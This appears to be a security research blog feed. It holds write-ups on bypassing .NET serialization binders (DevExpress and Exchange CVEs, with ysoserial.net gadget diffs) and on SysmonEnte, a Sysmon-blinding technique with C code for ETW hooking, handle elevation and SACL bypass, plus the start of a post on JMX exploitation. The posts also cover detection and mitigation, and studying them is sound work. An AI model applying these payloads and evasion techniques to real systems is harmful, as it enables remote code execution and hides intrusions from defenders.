
Bypassing .NET Serialization Binders

28 June 2022 at 14:00

Serialization binders are often used to validate types specified in the serialized data to prevent the deserialization of dangerous types that can have malicious side effects with the runtime serializers such as the BinaryFormatter.

In this blog post we'll have a look at cases where this can fail and consequently may allow bypassing the validation. We'll also walk through two real-world examples of insecure serialization binders in the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277), which both allow remote code execution.

Introduction

Type Names

Type names are used to identify .NET types. In its fully qualified form (also known as the assembly qualified name, AQN), the type name also contains information on the assembly the type should be loaded from. This information comprises the assembly's name as well as attributes specifying its version, culture, and a token of the public key it was signed with. Here is an (extensive) example of such an assembly qualified name:

System.Collections.Concurrent.ConcurrentBag`1+ListOperation[
    [System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]
],
System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089

This assembly qualified name comprises two parts with several components:

  • Assembly Qualified Name (AQN)
    • Type Full Name
      • Namespace
      • Type Name
      • Generic Type Parameters Indicator
      • Nested Type Name
      • Generic Type Parameters
      • Embedded Type AQN (EAQN)
    • Assembly Full Name
      • Assembly Name
      • Assembly Attributes

You can see that the same breakdown can also be applied to the embedded type's AQN. For simplicity, the type info will be referred to as type name and the assembly info will be referred to as assembly name as these are the general terms used by .NET and thus also within this post.

The assembly and type information are used by the runtime to locate and bind the assembly. That software component is also sometimes referred to as the CLR Binder.

Serialization Binders

In its original intent, a SerializationBinder was supposed to work just like the runtime binder but only in the context of serialization/deserialization with the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:

Some users need to control which class to load, either because the class has moved between assemblies or a different version of the class is required on the server and client. — SerializationBinder Class

For that, a SerializationBinder provides two methods:

  • public virtual void BindToName(Type serializedType, out string assemblyName, out string typeName);
  • public abstract Type BindToType(string assemblyName, string typeName);

BindToName gets called during serialization and allows controlling the assemblyName and typeName values that get written to the serialized stream. On the other side, BindToType gets called during deserialization and allows controlling the Type being returned, depending on the assemblyName and typeName that were read from the serialized stream. As the latter method is abstract, derived classes need to provide their own implementation of it.

During the time .NET deserialization issues rose in 2017, the remark "SerializationBinder can also be used for security" was added to the SerializationBinder documentation. Later in 2020, that remark was changed to the exact opposite:

That is probably why developers (mis-)use them as a security measure to prevent the deserialization of malicious types. And this approach is still widely used, even though those serializers have long been deprecated for obvious reasons.

But using a SerializationBinder for validating the type to be deserialized can be tricky and has pitfalls that may allow bypassing the validation, depending on how it is implemented.

What could possibly go wrong?

For validating the specified type, developers can either

  1. work solely on the string representations of the specified assembly name and type name, or
  2. try to resolve the specified type and then work with the returned Type.

Each of these strategies has its own advantages and disadvantages.

Advantages/Disadvantages of Validation Before/After Type Binding

The advantage of the former is that type resolution is cost intensive, and hence some advise against it to prevent possible denial of service attacks.

On the other hand, type name parsing is not that straightforward, and the internal type parser/binder of .NET allows some unexpected quirks:

  • whitespace characters (i. e., U+0009, U+000A, U+000D, U+0020) are generally ignored between tokens, in some cases even further characters
  • type names can begin with a "." (period), e. g., .System.Data.DataSet
  • assembly names are case-insensitive and can be quoted, e. g., MsCoRlIb and "mscorlib"
  • assembly attribute values can be quoted, even improperly, e. g., PublicKeyToken="b77a5c561934e089" and PublicKeyToken='b77a5c561934e089
  • .NET Framework assemblies often only require the PublicKey/PublicKeyToken attribute, e. g., System.Data.DataSet, System.Data, PublicKey=00000000000000000400000000000000 or System.Data.DataSet, System.Data, PublicKeyToken=b77a5c561934e089
  • assembly attributes can be in arbitrary order, e. g., System.Data, PublicKeyToken=b77a5c561934e089, Culture=neutral, Version=4.0.0.0
  • arbitrary additional assembly attributes are allowed, e. g., System.Data, Foo=bar, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, Baz=quux
  • assembly attributes can consist of almost arbitrary data (supported escape sequences: \", \', \,, \/, \=, \\, \n, \r, and \t)

This renders detecting known dangerous types based on their names basically impractical (and deny-listing is always a bad idea anyway). Instead, only known safe types should be allowed and anything else should result in an exception being thrown.

In contrast to that, resolving the type before validation allows working with a normalized form of the type. But type resolution/binding may also fail, and depending on how the custom SerializationBinder handles such cases, it can allow attackers to bypass validation.

SerializationBinder Usages

If you keep in mind that the SerializationBinder was supposedly never meant to be used as a security measure (otherwise it would probably have been named SerializationValidator or similar), it becomes clearer once you see how it is actually used by the BinaryFormatter, SoapFormatter, and NetDataContractSerializer:

  • System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.ObjectReader.Bind(string, string)
  • System.Runtime.Serialization.Formatters.Soap.SoapFormatter.ObjectReader.Bind(string, string)
  • System.Runtime.Serialization.XmlObjectSerializerReadContextComplex.ResolveDataContractTypeInSharedTypeMode(string, string, out Assembly)

Let's have a closer look at the first one, ObjectReader.Bind(string, string) used by BinaryFormatter:

Here you can see that if the SerializationBinder.BindToType(string, string) call returns null, the fallback ObjectReader.FastBindToType(string, string) gets called.

Here, if the BinaryFormatter uses FormatterAssemblyStyle.Simple (i. e., bSimpleAssembly == true, which is the default for BinaryFormatter), the specified assembly name is used to create an AssemblyName instance, and an attempt is made to load the corresponding assembly with it. This must succeed, otherwise ObjectReader.FastBindToType(string, string) immediately returns null. It then tries to load the specified type with ObjectReader.GetSimplyNamedTypeFromAssembly(Assembly, string, ref Type).

This method first calls FormatterServices.GetTypeFromAssembly(Assembly, string) that tries to load the type from the already resolved assembly using Assembly.GetType(string) (not depicted here). But if that fails, it uses Type.GetType(string, Func<AssemblyName, Assembly>, Func<Assembly, string, bool, Type>, bool) with the specified type name as first parameter. Now if the specified type name happens to be an AQN, type loading succeeds and it returns the type specified by the AQN regardless of the already loaded assembly.

That means, unless the custom SerializationBinder.BindToType(string, string) implementation uses the same algorithm as ObjectReader.FastBindToType(string, string), it might be possible to make the custom SerializationBinder fail while ObjectReader.FastBindToType(string, string) still succeeds. And if the custom SerializationBinder.BindToType(string, string) method does not throw an exception on failure but silently returns null instead, it allows bypassing any type validation implemented in SerializationBinder.BindToType(string, string).

This behavior was already mentioned in Jonathan Birch's Dangerous Contents - Securing .Net Deserialization in 2017:

Don't return null for unexpected types – this makes some serializers fall back to a default binder, allowing exploits.
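To illustrate the pitfall, a custom binder following this anti-pattern might look roughly like the following (a minimal, hypothetical sketch; the class name and the allow-list entry are made up):

using System;
using System.Runtime.Serialization;

class NaiveAllowListBinder : SerializationBinder
{
    public override Type BindToType(string assemblyName, string typeName)
    {
        // hypothetical allow-list entry
        if (typeName == "MyApp.Data.SafeDto")
        {
            return Type.GetType(typeName + ", " + assemblyName);
        }

        // BAD: returning null makes the BinaryFormatter fall back to
        // ObjectReader.FastBindToType(string, string), which may still
        // resolve the type if the type name happens to be an AQN.
        return null;

        // Safer: throw new SerializationException("Type not allowed: " + typeName);
    }
}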

Origin of the Assembly Name and Type Name

The assembly name and type name values passed to the SerializationBinder.BindToType(string, string) during deserialization originate from the serialized stream: the assembly name is read by BinaryAssembly.Read(__BinaryParser) and the type name by BinaryObjectWithMapTyped.Read(__BinaryParser).

On the serializing side, these values are written to the stream by BinaryAssembly.Write(__BinaryWriter) and BinaryObjectWithMapTyped.Write(__BinaryWriter). The written values originate from a SerObjectInfoCache instance, whose values are set in the two available constructors:

In the latter case, the assembly name and type name are obtained from the TypeInformation returned by BinaryFormatter.GetTypeInformation(Type). In the former case, however, the assembly name and type name are adopted from the SerializationInfo instance filled during serialization if the assembly name or type name was set explicitly via SerializationInfo.AssemblyName and SerializationInfo.FullTypeName, respectively.

That means, besides using SerializationInfo.SetType(Type), it is also possible to set the assembly name and type name explicitly and independently as strings by using SerializationInfo.AssemblyName and SerializationInfo.FullTypeName:

[Serializable]
class Marshal : ISerializable
{
    public void GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AssemblyName = "…";
        info.FullTypeName = "…";
    }
}

There is also another and probably more convenient way to specify an arbitrary assembly name and type name by using a custom SerializationBinder during serialization:

class CustomSerializationBinder : SerializationBinder
{
    public override void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = "…";
        typeName     = "…";
    }

    public override Type BindToType(string assemblyName, string typeName)
    {
        throw new NotImplementedException();
    }
}

This allows fiddling with all assembly names and type names that are used within the object graph to be serialized.
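For example, the binder can be attached to the serializing BinaryFormatter roughly like this (sketch; payloadObject stands for whatever object graph is to be serialized):

using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

static byte[] SerializeWithCustomBinder(object payloadObject)
{
    var formatter = new BinaryFormatter
    {
        // binder from the snippet above; its BindToName controls the written names
        Binder = new CustomSerializationBinder()
    };

    using (var stream = new MemoryStream())
    {
        formatter.Serialize(stream, payloadObject);
        return stream.ToArray();
    }
}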

Common Pitfalls of Custom SerializationBinders

There are two common pitfalls that can render a SerializationBinder bypassable:

  1. parsing the passed assembly name and type name differently than the .NET runtime does
  2. resolving the specified type differently than the .NET runtime does

We will demonstrate these with two case studies: the DevExpress framework (CVE-2022-28684) and Microsoft Exchange (CVE-2022-23277).

Case Study № 1: SafeSerializationBinder in DevExpress (CVE-2022-28684)

Despite its name, the DevExpress.Data.Internal.SafeSerializationBinder class of DevExpress.Data is not really a SerializationBinder. But its Ensure(string, string) method is used by the DXSerializationBinder.BindToType(string, string) method to check for safe and unsafe types.

It does this by checking the assembly name and type name against a list of known unsafe types (i. e., UnsafeTypes class) and known safe types (i. e., KnownTypes class). To pass the validation, the former must not match while the latter must match as both XtraSerializationSecurityTrace.UnsafeType(string, string) and XtraSerializationSecurityTrace.NotTrustedType(string, string) result in an exception being thrown.

The check in each Match(string, string) method comprises a match against so-called type ranges and several full type names.

A type range is basically a pair of assembly name and namespace prefix that the passed assembly name and type name are tested against.

Here is the definition of UnsafeTypes.typeRanges that UnsafeTypes.Match(string, string) tests against:

And here UnsafeTypes.types:

This set basically comprises the types used in public gadgets such as those of YSoSerial.Net.

Remember that SafeSerializationBinder.Ensure(string, string) does not resolve the specified type but only works on the assembly name and type name read from the serialized stream. The type binding/resolution attempt happens after the string-based validation in DXSerializationBinder.BindToType(string, string), where Assembly.GetType(string, bool) is used to load the specified type from the specified assembly but without throwing an exception on error (i. e., false is passed).

We'll demonstrate how a System.Data.DataSet can be used to bypass the validation in SafeSerializationBinder.Ensure(string, string) even though it is contained in UnsafeTypes.types.

As DXSerializationBinder.BindToType(string, string) can return null in two cases (assembly == null or Assembly.GetType(string, bool) returns null), it is possible to craft an assembly name and type name pair that fails loading while the fallback ObjectReader.FastBindToType(string, string) still returns the proper type.

In the first attempt, we'll update the ISerializable.GetObjectData(SerializationInfo, StreamingContext) implementation of the DataSet gadget of YSoSerial.Net so that the assembly name is mscorlib and the type name is the AQN of System.Data.DataSet:

diff --git a/ysoserial/Generators/DataSetGenerator.cs b/ysoserial/Generators/DataSetGenerator.cs
index ae4beb8..1755e62 100644
--- a/ysoserial/Generators/DataSetGenerator.cs
+++ b/ysoserial/Generators/DataSetGenerator.cs
@@ -62,7 +62,8 @@ namespace ysoserial.Generators

         public void GetObjectData(SerializationInfo info, StreamingContext context)
         {
-            info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
             info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
             info.AddValue("DataSet.DataSetName", "");
             info.AddValue("DataSet.Namespace", "");

With a breakpoint at DXSerializationBinder.BindToType(string, string), we'll see that the first call to SafeSerializationBinder.Ensure(string, string) passes. This is because we use the AQN of System.Data.DataSet as the type name while UnsafeTypes.types only contains the full name System.Data.DataSet. And as the pair of assembly name mscorlib and type name prefix System. is contained in KnownTypes.typeRanges, it passes validation.

But now the assembly name and type name are passed to SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string):

That method apparently tries to extract the type name and assembly name from an AQN passed in typeName. It does this by looking for the last position of , in typeName and checking whether the part behind that position starts with version=. If that's not the case, the loop looks for the second last, then the third last, and so on. If version= was found, the algorithm assumes that the next iteration will also contain the assembly name (remember, the version is the first assembly attribute in the normalized form), flag gets set to true, and in the next loop iteration the position of the preceding , marks the delimiter between the type name and assembly name. At the end, the passed assemblyName value (stored in a) and the extracted assembly name get compared. If they differ, true gets returned and the extracted assembly name and type name are checked by another call to SafeSerializationBinder.Ensure(string, string).

With our AQN passed as type name, SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) extracts the proper values so that the call to SafeSerializationBinder.Ensure(string, string) throws an exception. That didn't work.

So in what cases does SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) return false so that the second call to SafeSerializationBinder.Ensure(string, string) does not happen?

There are five return statements: three always return false (lines 28, 36, and 42) and the other two only return false when the passed assemblyName value equals the extracted assembly name (lines 21 and 51).

Let's first look at those always returning false: in two cases (lines 28 and 42), the condition depends on whether the typeName contains a ] after the last ,. We can achieve that by adding a custom assembly attribute to our AQN that contains a ], which is perfectly valid:

diff --git a/ysoserial/Generators/DataSetGenerator.cs b/ysoserial/Generators/DataSetGenerator.cs
index ae4beb8..1755e62 100644
--- a/ysoserial/Generators/DataSetGenerator.cs
+++ b/ysoserial/Generators/DataSetGenerator.cs
@@ -62,7 +62,8 @@ namespace ysoserial.Generators

         public void GetObjectData(SerializationInfo info, StreamingContext context)
         {
-            info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName + ", x=]";
             info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
             info.AddValue("DataSet.DataSetName", "");
             info.AddValue("DataSet.Namespace", "");

Now SafeSerializationBinder.EnsureAssemblyQualifiedTypeName(string, string) returns false without updating the typeName or assemblyName values. Loading the mscorlib assembly will succeed, but the specified DataSet type won't be found in it, so DXSerializationBinder.BindToType(string, string) also returns null and the fallback ObjectReader.FastBindToType(string, string) attempts to load the type, which finally succeeds.

Case Study № 2: ChainedSerializationBinder in Exchange Server (CVE-2022-23277)

After my colleague @frycos published his story on Searching for Deserialization Protection Bypasses in Microsoft Exchange (CVE-2022-21969), I was curious whether it was still possible to bypass the security measures implemented in the Microsoft.Exchange.Diagnostics.ChainedSerializationBinder class.

The ChainedSerializationBinder is used for a BinaryFormatter instance created by Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation, bool, string[], string[]) to resolve the specified type and then test it against a set of allowed and disallowed types to abort deserialization in case of a violation.

Within the ChainedSerializationBinder.BindToType(string, string) method, the passed assembly name and type name parameters are forwarded to InternalBindToType(string, string) (not depicted here) and then to LoadType(string, string). Note that the type only gets validated using the ValidateTypeToDeserialize(Type) method if it was loaded successfully.

Inside LoadType(string, string), an attempt is made to load the type by combining both values in various ways, either via Type.GetType(string) or by iterating over the already loaded assemblies and calling Assembly.GetType(string) on each. If loading the type fails, LoadType(string, string) returns null and BindToType(string, string) also returns null, so the validation via ValidateTypeToDeserialize(Type) never happens.

When ChainedSerializationBinder.BindToType(string, string) returns null to ObjectReader.Bind(string, string), the fallback method ObjectReader.FastBindToType(string, string) gets called to resolve the type. Since ChainedSerializationBinder.BindToType(string, string) uses a different algorithm to resolve the type than ObjectReader.FastBindToType(string, string) does, it is possible to bypass the validation of the ChainedSerializationBinder via the aforementioned tricks.

Here, either of the two ways (a custom marshal class or a custom SerializationBinder during serialization) works. The following demonstrates this with System.Data.DataSet:
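For the latter, the BindToName override might look roughly like this sketch (it simply emits the mscorlib/AQN pair from the first DevExpress attempt; the exact pair that makes a given binder's LoadType() fail may need adjusting):

public override void BindToName(Type serializedType, out string assemblyName, out string typeName)
{
    if (serializedType == typeof(System.Data.DataSet))
    {
        // a pair the custom binder fails to resolve while
        // ObjectReader.FastBindToType() still resolves the AQN in typeName
        assemblyName = "mscorlib";
        typeName     = typeof(System.Data.DataSet).AssemblyQualifiedName;
        return;
    }

    assemblyName = serializedType.Assembly.FullName;
    typeName     = serializedType.FullName;
}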

Conclusion

The insecure serializers BinaryFormatter, SoapFormatter, and NetDataContractSerializer should no longer be used and legacy code should be migrated to the preferred alternatives.

If you happen to encounter a SerializationBinder, check how the type resolution and/or validation is implemented and whether BindToType(string, string) has a case that returns null so that the fallback ObjectReader.FastBindToType(string, string) may get a chance to resolve the type instead.

Attacks on Sysmon Revisited - SysmonEnte

In this blog post we demonstrate an attack on the integrity of Sysmon which generates a minimal amount of observable events, making this attack difficult to detect in environments where no additional security products are installed.

tl;dr:

  • Suspend all threads of Sysmon.
  • Create a limited handle to Sysmon and elevate it by duplication.
  • Clone the pseudo handle of Sysmon to itself in order to bypass SACL as proposed by James Forshaw.
  • Inject a hook manipulating all events (in particular ProcessAccess events on Sysmon).
  • Resume all threads.

We also release a POC called SysmonEnte.

Background

At Code White we are used to performing complex attacks against hardened and strictly monitored environments. A reasonable approach to stay under the radar of the blue team is to blend in with false positives by adapting normal process and user behavior, carefully choosing host processes for injected tools, and targeting specific user accounts.

However, clients with whom we have been working for a while have reached a high level of maturity. Their security teams strictly follow all the hardening advice we give them and invest a lot of time in collecting and base-lining security related logs while constantly developing and adapting detection rules.

We often see clients making heavy use of Sysmon, along with the Windows Event Logs and a traditional AV solution. For them, Sysmon is the root of trust for their security monitoring and its integrity must be ensured. However, an attacker who successfully and covertly compromises the integrity of Sysmon effectively breaks the security model of these clients.

In order to undermine the aforementioned security-setup, we aimed at attacking Sysmon to tamper with events in a manner which is difficult to detect using Sysmon itself or the Windows Event Logs.

Attacks on Sysmon and Detection

Having done some Googling on how to blind Sysmon, we realized that all publicly documented ways (at least those we found) are detectable via Sysmon itself or the Windows Event Logs:

While we were confident that we could kill Sysmon before it throws Event ID 5 (Process terminated), we thought that a host not sending any events would be suspicious and could be noticed in a client's SIEM. Also, loading a signed, whitelisted and exploitable driver to attack from kernel land was out of scope to maintain stability.

Since all of these documented attack vectors are somehow detectable via Sysmon itself or the Windows Event Logs, or can cause stability issues, we needed a new attack vector with the following capabilities:

  1. Not detectable via Sysmon itself
  2. Not detectable via Windows Event Log
  3. Sysmon must stay alive
  4. Attack from usermode

Injecting and manipulating the control flow of Sysmon seemed the most promising.

Attack Description

Similarly to SysmonQuiet or EvtMute, the idea is to inject code into Sysmon which redirects the execution flow in such a way that events can be manipulated before being forwarded to the SIEM.
However, the attack must work in such a way that corresponding ProcessAccess events on Sysmon are not observable via Sysmon or the Event Log.

This presents various problems, but let us first see where such a hook would be applicable.

Manipulating the Execution Flow

Sysmon forwards events to ETW subscribers via the documented function ntdll!EtwEventWrite. This is easily observable by setting an appropriate breakpoint.

The function has the following prototype:

ULONG EVNTAPI EtwEventWrite(
    __in REGHANDLE RegHandle,
    __in PCEVENT_DESCRIPTOR EventDescriptor,
    __in ULONG UserDataCount,
    __in_ecount_opt(UserDataCount) PEVENT_DATA_DESCRIPTOR UserData
);

The two most important arguments to the function are EventDescriptor and UserData.

typedef struct _EVENT_DESCRIPTOR {
    USHORT    Id;
    UCHAR     Version;
    UCHAR     Channel;
    UCHAR     Level;
    UCHAR     Opcode;
    USHORT    Task;
    ULONGLONG Keyword;
} EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR;

The Id field of the EVENT_DESCRIPTOR determines the type of event and is important for applying the correct struct definition to the event data pointed to by PEVENT_DATA_DESCRIPTOR. The structs obviously differ for each Sysmon event ID, as different fields and information are included. Our injected code must thus be able to apply the correct struct depending on which event is being emitted by Sysmon.

But how do we know the definition of the event structs? Luckily, ETW Explorer has already documented the event definitions:

A definition for the userdata struct describing a ProcessAccess event might therefore look as follows:

typedef struct _ProcessAccess {
    wchar_t*     pRuleName;
    size_t       sizeRuleName;
    wchar_t*     pUtcTime;
    size_t       sizeUtcTime;
    void*        psrcGUID;
    size_t       sizesrcguid;
    void*        ppidsrc;
    size_t       sizepidsrc;
    void*        ptidsrc;
    size_t       sizetidsrc;
    wchar_t*     psourceimage;
    size_t       sizesourceimage;
    void*        ptarGUID;
    size_t       sizetarGUID;
    void*        ppiddest;
    size_t       sizepiddest;
    wchar_t*     ptargetimage;
    size_t       sizetargetimage;
    PACCESS_MASK pGrantedAccess;
    size_t       sizeGrantedAccess;
    wchar_t*     pCalltrace;
    size_t       sizecalltrace;
    wchar_t*     pSourceUser;
    size_t       sizeSourceUser;
    wchar_t*     pTargetUser;
    size_t       sizetargetUser;
} ProcessAccess, *PProcessAccess;

We can validate this in x64dbg by setting a breakpoint at ntdll!EtwEventWrite and applying the said struct definition for a ProcessAccess event.

Faking events

With ntdll!EtwEventWrite being responsible for forwarding events, it is a good place to install a hook that redirects the control flow to injected code which first manipulates the event and then forwards it:

The injected code manipulating the events might look like this:

//Hooked EtwEventWrite Function
ULONG Hook_EtwEventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData)
{
    //Get the address of the EtwEventWriteFull Function
    _EtwEventWriteFull EtwEventWriteFull = (_EtwEventWriteFull)getFunctionPtr(CRYPTED_HASH_NTDLL, CRYPTED_HASH_ETWEVENTWRITEFULL);
    if (EtwEventWriteFull == NULL)
    {
        goto exit;
    }

    //Check if it is a process access event and needs to be tampered with
    switch (EventDescriptor->Id)
    {
        case EVENT_PROCESSACCESS:
            HandleProcessAccess((PProcessAccess)UserData);
            break;
        default:
            break;
    }

    //Save the event with the EtwEventWriteFull Function
    EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);

exit:
    return 0;
}

// Make ProcessAccess events targeting Sysmon itself look benign
VOID HandleProcessAccess(PProcessAccess pProcessAccess)
{
    ACCESS_MASK access_mask_benign = 0x1400;
    PCWSTR wstr_sysmon = L"Sysmon";
    PCWSTR wstr_ente = L"Ente";

    //Sysmon check
    PCWSTR psysmon = StrStrIW(pProcessAccess->ptargetimage, wstr_sysmon);
    if (psysmon != NULL)
    {
        //Replace the access mask with 0x1400
        *pProcessAccess->pGrantedAccess = access_mask_benign;
        pProcessAccess->sizeGrantedAccess = sizeof(access_mask_benign);

        //Replace the Source User with Ente
        lstrcpyW(pProcessAccess->pSourceUser, wstr_ente);
        pProcessAccess->sizeSourceUser = sizeof(wstr_ente);
    }
}

Note how ntdll!EtwEventWriteFull is used to forward every event.

Since we know where to inject the hook and what the UserData structs look like, we are now able to tamper with every Sysmon event before it is forwarded.

However, the injection into Sysmon remains observable and the corresponding ProcessAccess event is the last event we do not control.

Detection of Process Manipulation

OpenProcess Access event

In order to create a handle to Sysmon which allows us to conduct process injection of any kind, we need to open Sysmon with at least the following access mask: PROCESS_VM_OPERATION | PROCESS_VM_WRITE. As Sysmon has not yet been modified when we open this handle, a suspicious ProcessAccess event is generated, which is an IOC defenders could hunt for:

Handle Elevation

While playing with kernel32!DuplicateHandle for another project, we noticed that MSDN states something very interesting:

In some cases, the new handle can have more access rights than the original handle.

Thus, by first creating a handle with a very limited access mask and then duplicating this handle with a new access mask, we technically do not create a new handle with a high access mask.

HANDLE hSysmon = NULL;
HANDLE hhighpriv = NULL;
BOOL bsuccess = FALSE;

hSysmon = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, 3340);
bsuccess = DuplicateHandle(GetCurrentProcess(), hSysmon, GetCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0);

Sysmon (which, to the best of our knowledge, only uses OB_OPERATION_HANDLE_CREATE) only sees the benign access mask, but not the duplication of the handle with a higher access mask:

Using handle elevation, we can gain handles with arbitrary process access masks to arbitrary (non-PPL) processes while Sysmon only logs the instantiation of the original handle. Great success!

Unfortunately, there are some problems:

  1. This only works if the targeted process runs as the same user as the duplicating process.

This can be easily circumvented by stealing a token from a System process. We steal the token from an elevated svchost process running as System using only a PROCESS_QUERY_LIMITED_INFORMATION mask, so we do not need the SE_DEBUG privilege which is often used in detection rules.

  2. System Access Control Lists (SACL). This is a bigger problem.

Detection via System Access Control Lists (SACL)

Unfortunately, it is still possible to observe the duplication of the handle by configuring Object Access Auditing using a SACL on Sysmon. The following screenshot shows how ProcessHacker is leveraged to configure the SACL:

With this SACL, event 4656 is generated by the Windows Event Log service upon creation of a handle to Sysmon that allows writing to its memory. This event is also emitted if handle elevation is used.

Note: In the default config, Object Access Auditing is not enabled.

SACL Bypass by James Forshaw

Fortunately for us, James Forshaw published a great blog post on how to evade SACLs.

According to the post, we can duplicate the pseudo handle of a different process to itself to get full access to the process without triggering Object Access Auditing.

A stealthy way to gain a handle suitable for process injection would be the following:

  1. Open a process handle to Sysmon with a very limited access mask (A detection rule based on this would generate too many false positives)
  2. Elevate this handle using ntdll!NtDuplicateObject to hold the PROCESS_DUP_HANDLE right (bypasses Sysmon's telemetry)
  3. Use the elevated handle to duplicate the pseudo Handle of Sysmon (Bypasses SACL).
uPid.UniqueProcess = dwPid;
uPid.UniqueThread = 0;

ntStatus = NtOpenProcess(&hlowpriv, PROCESS_QUERY_LIMITED_INFORMATION, &ObjectAttributes, &uPid);
if (!NT_SUCCESS(ntStatus))
    FATAL("[-] Failed to open low priv handle to sysmon\n");

ntStatus = NtDuplicateObject(NtCurrentProcess(), hlowpriv, NtCurrentProcess(), &hduppriv, PROCESS_DUP_HANDLE, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
    FATAL("[-] Failed to elevate to handle with PROCESS_DUP_HANDLE rights\n");

ntStatus = NtDuplicateObject(hduppriv, NtCurrentProcess(), NtCurrentProcess(), &hhighpriv, PROCESS_ALL_ACCESS, FALSE, 0);
if (!NT_SUCCESS(ntStatus))
    FATAL("[-] Failed to elevate to handle with PROCESS_ALL_ACCESS rights\n");

By doing so, we gain a full-access handle to Sysmon while bypassing Sysmon's telemetry and the SACL.

Fine Tuning

There was one last IOC we could come up with: Sysmon can only observe the creation of a limited handle to itself. However, following the golden rule of never touching disk, our tool being unpacked or injected into another process will have a broken call trace containing unknown sections. Since Sysmon has not been tampered with at this point, this would be the last event which we do not have under control, and it might be sufficient to create a detection rule upon!

We can delay the forwarding of this event by suspending all threads of Sysmon. The events are then queued and dispatched only after we resume the threads, giving us enough time to install a hook manipulating all ProcessAccess events on Sysmon itself. This is possible because no Sysmon events exist for accessing, suspending or resuming a thread.
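Suspending and resuming the Sysmon threads can be done with the usual toolhelp APIs, roughly like this (simplified sketch, error handling omitted):

#include <windows.h>
#include <tlhelp32.h>

// Suspend (bSuspend = TRUE) or resume (bSuspend = FALSE) all threads of a process
void SetThreadsState(DWORD dwPid, BOOL bSuspend)
{
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te = { .dwSize = sizeof(te) };

    if (Thread32First(hSnap, &te))
    {
        do
        {
            if (te.th32OwnerProcessID != dwPid)
                continue;

            HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te.th32ThreadID);
            if (hThread == NULL)
                continue;

            if (bSuspend)
                SuspendThread(hThread);
            else
                ResumeThread(hThread);

            CloseHandle(hThread);
        } while (Thread32Next(hSnap, &te));
    }

    CloseHandle(hSnap);
}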

The hook then necessarily spoofs the callstack included in the ProcessAccess event.

Putting It All Together

We combined all of these steps into a tool we call SysmonEnte, which you can find on our GitHub.

SysmonEnte is implemented as fully position independent code (PIC) which can be called using the following prototype:

DWORD go(DWORD dwPidSysmon);

A sample loader is included and built during compilation when typing make.

Additionally, SysmonEnte uses indirect syscalls to bypass userland hooks while injecting into Sysmon.

The open source variant tampers with process access events targeting Lsass and Sysmon and sets the access mask to a benign one. Additionally, the source user and the call trace are set to Ente. You can adapt these to your needs.

Possible Detection Methods

From our point of view, a few detection approaches exist:

ETW TI

The easiest solution would be to subscribe to the Threat Intelligence ETW provider to observe injections or suspicious code manipulations. This however requires a signed ELAM driver.

Kernel Callbacks

If you have the possibility to run as a kernel driver, you can implement the callback for OB_OPERATION_HANDLE_DUPLICATE to monitor for Object Access Auditing bypasses (see https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_ob_operation_registration).

Object Access Auditing

If you have the possibility to enable Object Access Auditing, you can configure a SACL for Sysmon that monitors the duplication of handles and thereby catches the SACL bypass used to gain a handle to Sysmon. We are not sure about false positives in large environments, though.

To the best of our knowledge, and in contrast to SACLs for filesystem or registry operations, configuring Object Access Auditing on processes is only achievable by writing a custom program. This circumstance makes the detection of handle duplication via SACL non-trivial.

A sample program is included on our GitHub; it configures a SACL with ACCESS_SYSTEM_SECURITY + PROCESS_DUP_HANDLE + PROCESS_VM_OPERATION, applied to the group Everyone. ACCESS_SYSTEM_SECURITY is included because otherwise attackers could covertly change the SACL.

With this configuration, attempts to duplicate a handle to Sysmon should become visible.

Note: Object Access Auditing is not enabled by default and must be enabled via Group Policy prior to using the tool.

Final Words

Sysmon on its own is not able to protect itself sufficiently, and it is difficult to observe the described attack with the Event Log.
We believe that running Sysmon alone, without any protection from a trusted third-party tool sitting in kernel land or running as a PPL, is not guaranteed to produce reliable logs with ensured integrity. A possible fix by Microsoft would be to allow running Sysmon as a PPL.

It is noteworthy that the described technique of handle elevation + SACL bypass can also be used to stealthily dump Lsass.

After our talk at X33fcon, nanodump supports handle elevation as well. However, a SACL with PROCESS_VM_READ is configured for Lsass by default. ;-)


JMX Exploitation Revisited

20 March 2023 at 09:38

The Java Management Extensions (JMX) are used by many if not all enterprise-level Java applications for managing and monitoring application settings and metrics. While exploiting an accessible JMX endpoint is well known and several free tools are available, this blog post will present new insights and a novel exploitation technique that allows for instant Remote Code Execution with no further requirements, such as outgoing connections or the existence of application-specific MBeans.

Introduction

How to exploit remote JMX services is well known. For instance, Attacking RMI based JMX services by Hans-Martin Münch gives a pretty good introduction to JMX as well as a historical overview of attacks against exposed JMX services. You may want to read it before proceeding so that we're on the same page.

